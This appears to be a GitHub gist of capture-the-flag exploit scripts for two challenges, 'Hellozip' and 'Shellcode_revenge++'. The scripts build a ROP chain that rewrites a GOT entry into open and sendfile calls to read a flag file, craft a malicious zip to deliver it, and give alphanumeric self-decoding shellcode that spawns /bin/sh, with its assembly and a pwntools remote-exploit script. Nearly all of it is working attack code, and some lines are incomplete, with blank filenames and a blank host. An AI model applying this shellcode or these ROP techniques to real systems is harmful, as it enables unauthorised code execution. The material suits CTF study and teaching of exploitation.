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Last active December 18, 2017 03:07
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Shellcode_revenge++, Hellozip
#!/usr/bin/env python
# coding=utf8
from pwn import p32, p16
pop_2 = 0x8048F9A
pop_1 = 0x8048F9B
add_ptrebp_bl = 0x080488ac
pop_ebp = 0x08048898
pop_ebx = 0x080484a1
ret = 0x8048B87
readable_addr = ret
add_eax_ptrebx = 0x080492bb
string_buf = 0x804B064
write_plt = 0x8048550
write_got = 0x804B030
rop_chain = (
# I wrote a execve version of exp, but it *dropped EGID* in the server
# whatever command it executed. Although it worked fine in my local
# machine. I don't know why, it's really werid.
# So I tried to do all the open-read-write stuffs in one ROP-chain.
# The main goal is to open('flag', 0) and sendfile(1, 3, 0, 100)
p32(pop_1) + p32(readable_addr) + # pop some corrupted stack
# craft open() on write_got
# I could just find the gadget to ADD byte by byte. It's add_ptrebp_bl, go
# check about that.
p32(pop_ebx) + p32(0x80) +
p32(pop_ebp) + p32(write_got + 0x3d) +
p32(add_ptrebp_bl) +
p32(pop_ebx) + p32(0xfc) +
p32(pop_ebp) + p32(write_got + 1 + 0x3d) +
p32(add_ptrebp_bl) +
# prepare 'flag' string
p32(pop_ebx) + p32(ord('f')) +
p32(pop_ebp) + p32(string_buf + 0x3d) +
p32(add_ptrebp_bl) +
p32(pop_ebx) + p32(ord('l')) +
p32(pop_ebp) + p32(string_buf + 1 + 0x3d) +
p32(add_ptrebp_bl) +
p32(pop_ebx) + p32(ord('a')) +
p32(pop_ebp) + p32(string_buf + 2 + 0x3d) +
p32(add_ptrebp_bl) +
p32(pop_ebx) + p32(ord('g')) +
p32(pop_ebp) + p32(string_buf + 3 + 0x3d) +
p32(add_ptrebp_bl) +
p32(pop_ebx) + p32(ord('\x00')) +
p32(pop_ebp) + p32(string_buf + 4 + 0x3d) +
p32(add_ptrebp_bl) +
# now open('flag', 0), and the returned file descriptor should be 3
p32(write_plt) + p32(pop_2) + p32(string_buf) + p32(0) +
# craft sendfile() on write_got. FYI, it's open() in write_got now.
p32(pop_ebx) + p32(0x50) +
p32(pop_ebp) + p32(write_got + 0x3d) +
p32(add_ptrebp_bl) +
p32(pop_ebx) + p32(0x7b) +
p32(pop_ebp) + p32(write_got + 1 + 0x3d) +
p32(add_ptrebp_bl) +
# maybe a carry bit will be triggered in previous operation, about
# 50% possibility. It's okay to ignore that.
# finally sendfile(1, 3, 0, 100)
p32(write_plt) + p32(0xdeadbeef) + p32(1) + p32(3) + p32(0) + p32(100)
payload = '\x00' * 276 + rop_chain
# Create with:
# with ZipFile('', 'w') as f:
# f.write('emptyfile', 'a')
template_zip_buf = '504b0304140000000000517a904b0000000000000000000000000100000061504b01021403140000000000517a904b000000000000000000000000010000000000000000000000a4810000000061504b050600000000010001002f0000001f0000000000'.decode('hex')
expzip_buf = \
template_zip_buf[:0x3b] + \
p16(len(payload)) + \
template_zip_buf[0x3d:0x4d] + \
payload + \
with open('', 'w') as f:
# Now scp to the /tmp dir in server,
# and run 'cd /home/hellozip; ./hellozip < /tmp/'
# Slightly modified from:
# Assembled (56 bytes):
# h/A//XH5PQO/P^hj5XVX1Fm1FuH3FqPTj0X40PP4u4NZ4jWSEW18EF0V
# Assembly:
# user@host $ as binsh.s -o binsh.o ; strings binsh.o
.section .data
.section .text
.globl _start
push $0x2f2f412f
pop %rax
xor $0x2f4f5150, %rax # RAX becomes 0x60107f. it's close to the buffer of 'name'. use it as the base of shellcode
push %rax
pop %rsi # Make use of '^', AKA pop %rsi
prepare_key: # "hj5XVX"
# put the xor key into %eax
push $0x5658356a # 'hj5XV' pushed backwards because x86 stack.
pop %rax # 'X'
decode_encoded_code: # "1FK"
#xor %eax, 0x4b(%rsi) # '1FK' encoded_code ; pops & syscall decoded
xor %eax, 0x6d(%rsi) # '1FK' encoded_code ; pops & syscall decoded
decode_encoded_data: # "1FSH3FO"
xor %eax, 0x75(%rsi) # '1FS' encoded_data + 4 ; "/sh\0" decoded
xor 0x71(%rsi), %rax # 'H3FO' encoded_data ; "/bin/sh\0" now in %rax
begin_stack_setup: # "PT"
push %rax # 'P' push "/bin/sh\0"
push %rsp # 'T' push pointer to /bin/sh
zero_rax: # "j0X40"
# xor %rax, %rax
push $0x30 # 'j0'
pop %rax # 'X'
xor $0x30, %al # '40' %rax is NULL
end_stack_setup: # "PP"
push %rax # 'P' push NULL
push %rax # 'P' push NULL
mov_3b_al: # "4u4N"
# mov $0x3b, %al
xor $0x75, %al # '4u'
xor $0x4e, %al # '4N' %al = 0x4e xor 0x75 = $0x3b
# this is for syscall ^
begin_stack_run: # "Z"
pop %rdx # 'Z' mov $0x00, %rdx ; %rdx = NULL
encoded_code: # "4jWS"
# 0x34 0x6a 0x57 0x53
.byte 0x34 # "\x5e" pop %rsi ; %rsi = NULL
.byte 0x6a # "\x5f" pop %rdi ; %rdi = pointer to "/bin/sh\0"
.byte 0x57 # "\x0f"
.byte 0x53 # "\x05" syscall ; execve("/bin/sh\0",NULL,NULL);
# syscall(%rax) = function(%rdi,%rsi,%rdx);
# syscall(0x3b) = execve("/bin/sh\0",NULL,NULL);
encoded_data: # "EW18EF0V" turns into "/bin/sh\0"
# 0x45 0x57 0x31 0x38 0x45 0x46 0x30 0x56
.byte 0x45 # /
.byte 0x57 # b
.byte 0x31 # i
.byte 0x38 # n
.byte 0x45 # /
.byte 0x46 # s
.byte 0x30 # h
.byte 0x56 # \0
#!/usr/bin/env python
# coding=utf8
from pwn import remote, process, p64, asm
# p = process('./shellcode_revenge++')
p = remote('', 10203)
shellcode = 'h/A//XH5PQO/P^hj5XVX1Fm1FuH3FqPTj0X40PP4u4NZ4jWSEW18EF0V'
shellcode = shellcode.ljust(80, 'G') # append nop
print shellcode
name_buf = 0x6010C0
payload = 'a' * 24 + p64(name_buf)
p.recvuntil('What\'s your name,')
p.recvuntil('messege for me!')
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